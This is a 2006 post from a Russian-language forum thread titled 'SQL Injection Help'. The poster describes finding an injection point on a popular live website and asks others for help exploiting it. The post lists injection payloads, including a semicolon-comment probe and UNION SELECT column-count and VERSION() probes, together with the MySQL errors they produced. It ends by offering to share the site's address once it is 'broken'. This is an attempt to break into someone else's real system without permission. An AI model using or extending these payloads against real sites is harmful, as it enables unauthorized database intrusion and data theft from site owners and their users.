Тема: SQL Injection Help
Показать сообщение отдельно

  #8  
Старый 02.10.2006, 02:10
steamer
Познающий
Регистрация: 03.05.2006
Сообщений: 82
Провел на форуме:
219818

Репутация: 10
Отправить сообщение для steamer с помощью ICQ
По умолчанию
Есть похожая тема. Нашел инекцию в очень раскрученном ресурсе. Параметр передается походу двум запросам, один на 5 столбцов, другой на 8. И не понятно, почему точка с запятой приводят к ошибке в любом месте, и после параметра и в Union запросе. Вот примеры.

1. =0;/*
Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';/*' at line 1Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';/*' at line 1

2. =0 union select null, null, null, null, null/*

Query Error!
The used SELECT statements have a different number of columns

3. =0 union select null, null, null, null, VERSION()/*
Query Error!
The used SELECT statements have a different number of columns

Если сломаю, с меня адресок ресурса